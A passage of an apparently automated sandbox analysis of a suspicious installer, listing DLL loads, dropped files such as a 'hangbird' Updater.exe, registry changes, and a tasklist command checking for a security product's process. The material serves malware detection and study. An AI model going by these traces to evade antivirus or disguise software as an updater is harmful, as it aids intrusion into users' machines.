          Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpWindow found: window name: TMainFormJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: file.exeStatic file information: File size 6172760 > 1048576
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdb source: file.exe, is-E0D1D.tmp.3.dr
          Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\dvs\p4\build\sw\devrel\Playpen\yyao\VRBench\VR-FCAT\FVSDK_rel_1_0\Symbols\FCAT_DT_Capture_x64.pdbz source: file.exe, is-E0D1D.tmp.3.dr
          Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2224707416.0000000004201000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2228529906.000000000427C000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2226347479.00000000040E0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_00B3310D
          Source: file.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x344343
          Source: file.tmp.2.drStatic PE information: real checksum: 0x0 should be: 0x344343
          Source: file.exeStatic PE information: real checksum: 0x5ee9e5 should be: 0x5e3598
          Source: file.exeStatic PE information: section name: .didata
          Source: file.tmp.0.drStatic PE information: section name: .didata
          Source: file.tmp.2.drStatic PE information: section name: .didata
          Source: is-E0D1D.tmp.3.drStatic PE information: section name: .didat
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B41046 push ecx; ret 35_2_00B41059
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140A165 push 0140A191h; ret 35_2_0140A189
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140A12D push 0140A159h; ret 35_2_0140A151
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013FA149 push 013FA175h; ret 35_2_013FA16D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013FA141 push 013FA175h; ret 35_2_013FA16D
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140A1A3 push 0140A1D1h; ret 35_2_0140A1C9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140A1A5 push 0140A1D1h; ret 35_2_0140A1C9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01402089 push ecx; mov dword ptr [esp], ecx35_2_0140208E
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013FA0C9 push 013FA138h; ret 35_2_013FA130
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013FA0C7 push 013FA138h; ret 35_2_013FA130
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409344 push 01409388h; ret 35_2_01409380
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409345 push 01409388h; ret 35_2_01409380
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01400333 push 014003C9h; ret 35_2_014003C1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_014043F3 push 01404421h; ret 35_2_01404419
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_014043F5 push 01404421h; ret 35_2_01404419
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140039D push 014003C9h; ret 35_2_014003C1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_014043B3 push 014043E1h; ret 35_2_014043D9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_014043B5 push 014043E1h; ret 35_2_014043D9
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01400211 push 01400287h; ret 35_2_0140027F
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_014092ED push 01409321h; ret 35_2_01409319
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_014092F5 push 01409321h; ret 35_2_01409319
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01400289 push 01400331h; ret 35_2_01400329
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F3555 push 013F35A6h; ret 35_2_013F359E
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01400400 push 0140044Eh; ret 35_2_01400446
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01400401 push 0140044Eh; ret 35_2_01400446
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_013F5479 push ecx; mov dword ptr [esp], eax35_2_013F547A
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140A48B push 0140A4B9h; ret 35_2_0140A4B1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_0140A48D push 0140A4B9h; ret 35_2_0140A4B1
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_014004B9 push 014004E5h; ret 35_2_014004DD
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409774 push 014097B8h; ret 35_2_014097B0
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_01409775 push 014097B8h; ret 35_2_014097B0
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\hangbird\is-7LJOT.tmpJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\hangbird\Updater.exe (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)Jump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmpJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00BB2558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,35_2_00BB2558
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00B35D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,35_2_00B35D03
          Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
